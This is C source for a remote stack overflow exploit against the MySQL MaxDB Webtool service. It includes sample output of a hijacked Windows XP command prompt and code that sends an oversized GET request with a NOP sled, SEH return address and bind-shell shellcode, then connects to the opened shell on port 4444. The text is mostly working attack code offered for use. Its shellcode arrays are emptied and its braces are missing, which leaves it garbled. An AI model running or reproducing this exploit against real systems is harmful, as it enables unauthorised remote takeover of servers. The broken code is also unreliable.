* MySQL MaxDB Webtool Remote Stack Overflow Exploit
* cybertronic[at]gmx[dot]net
* 04/27/2005
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ select target
* --[ 0 [0x100163d2] esi ebp ret
* --[ 1 [0xdeadc0de] crash server
* >> 0
* --[ connecting to!
* --[ sending packet [ 16383 bytes ]...done!
* --[ sleeping 5 seconds before connecting to
* --[ connecting to!
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
* C:\WINDOWS\system32>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 9999
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
* prototypes
int exploit ( int s, unsigned long ret );
int isip ( char *ip );
int shell ( int s, char* tip, unsigned short cbport );
void connect_to_bindshell ( char* tip, unsigned short bport );
void header ();
void wait ( int sec );
* Windows Shellcode *
/* win32_bind */
unsigned char bindshell[] =
unsigned char jmp1[] =
unsigned char jmp2[] =
"\xe9\xe2\xf7\xff\xff"; //jmp -2078
* structures
struct targets {
int num;
unsigned long ret;
char name[64];
target[]= {
{ 0, 0x100163d2, "WinXP Pro SP1 GER" }, //tested working on my WinXP Pro SP1 box [ pop pop ret in wapi.dll ]
{ 1, 0xdeadc0de, "crash server" },
* functions
exploit ( int s, unsigned long ret )
char buffer[16384];
bzero ( &buffer, sizeof ( buffer ) );
memset ( buffer, 0x90, sizeof ( buffer ) -13 );
strncpy ( buffer, "GET /%", 6 );
memcpy ( buffer + 1600, bindshell, sizeof ( bindshell ) - 1 );
memcpy ( buffer + 3657, jmp1, sizeof ( jmp1 ) -1 );
* SEH offset changes for different binary path
* This exploits WinXP Pro SP1 GER asuming the
* default path of C:\Programme\sdb\programs\web\Documents
* englisch version is supported by metasploit
* http://www.metasploit.com/projects/Framework/modules/exploits/maxdb_webdbm_get_overflow.pm
strncpy ( buffer + 3661, ( unsigned char* ) &ret, 4 );
memcpy ( buffer + 3673, jmp2, sizeof ( jmp2 ) -1 );
strncat ( buffer, "HTTP/1.0\r\n\r\n", 12 );
printf ( "--[ sending packet [ %u bytes ]...", strlen ( buffer ) );
if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
printf ( RED "failed!\n" NORMAL);
return ( 1 );
printf ( YELLOW "done!\n" NORMAL);
return ( 0 );
isip ( char *ip )
int a, b, c, d;
if ( !sscanf ( ip, "%d.%d.%d.%d", &a, &b, &c, &d ) )
return ( 0 );
if ( a < 1 )
return ( 0 );
if ( a > 255 )
return 0;
if ( b < 0 )
return 0;
if ( b > 255 )
return 0;
if ( c < 0 )
return 0;
if ( c > 255 )
return 0;
if ( d < 0 )
return 0;
if ( d > 255 )
return 0;
return 1;
shell ( int s, char* tip, unsigned short cbport )
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
if ( FD_ISSET ( s, &fd_read ) )
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
printf ( "bye bye...\n" );
if ( write ( 1, buffer, n ) < 0 )
printf ( "bye bye...\n" );
if ( FD_ISSET ( 0, &fd_read ) )
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
printf ( "bye bye...\n" );
if ( send ( s, buffer, n, 0 ) < 0 )
printf ( "bye bye...\n" );
connect_to_bindshell ( char* tip, unsigned short bport )
int s;
int sec = 5; // change this for fast targets
struct sockaddr_in remote_addr;
struct hostent *host_addr;
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
fprintf ( stderr, "cannot resolve \"%s\"\n", tip );
exit ( 1 );
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( bport );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
printf ( "socket failed!\n" );
exit ( 1 );
printf ("--[ sleeping %d seconds before connecting to %s:%u...\n", sec, tip, bport );
wait ( sec );
printf ( "--[ connecting to %s:%u...", tip, bport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
printf ( RED "failed!\n" NORMAL);
exit ( 1 );
printf ( YELLOW "done!\n" NORMAL);
shell ( s, tip, bport );
header ()
printf ( " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
wait ( int sec )
sleep ( sec );
main ( int argc, char* argv[] )
int s, targ, i;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
if ( argc != 2 )
printf ( "Usage: %s <ip>\n", argv[0] );
exit ( 1 );
system ( "clear" );
header ();
if ( !isip ( argv[1] ) )
printf ( "Invalid Target IP!\n" );
exit ( 1 );
printf("--[ select target\n");
for ( i = 0; i < 2; i++ )
printf ( "--[ %d [0x%08x] %s\n", target[i].num, target[i].ret, target[i].name );
printf ( " >> " );
scanf ( "%d", &targ );
if ( targ != 0 )
if ( targ != 1 )
printf ( "--[ invalid target!\n" );
exit ( 1 );
if ( ( host_addr = gethostbyname ( argv[1] ) ) == NULL )
fprintf ( stderr, "cannot resolve \"%s\"\n", argv[1] );
exit ( 1 );
remote_addr.sin_family = AF_INET;
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
remote_addr.sin_port = htons ( PORT );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
printf ( "socket failed!\n" );
exit ( 1 );
printf ( "--[ connecting to %s:%u...", argv[1], PORT );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
printf ( "failed!\n" );
exit ( 1 );
printf ( "done!\n" );
if ( exploit ( s, target[targ].ret ) == 1 )
printf ( "exploitation FAILED!\n" );
exit ( 1 );
close ( s );
connect_to_bindshell ( argv[1], 4444 );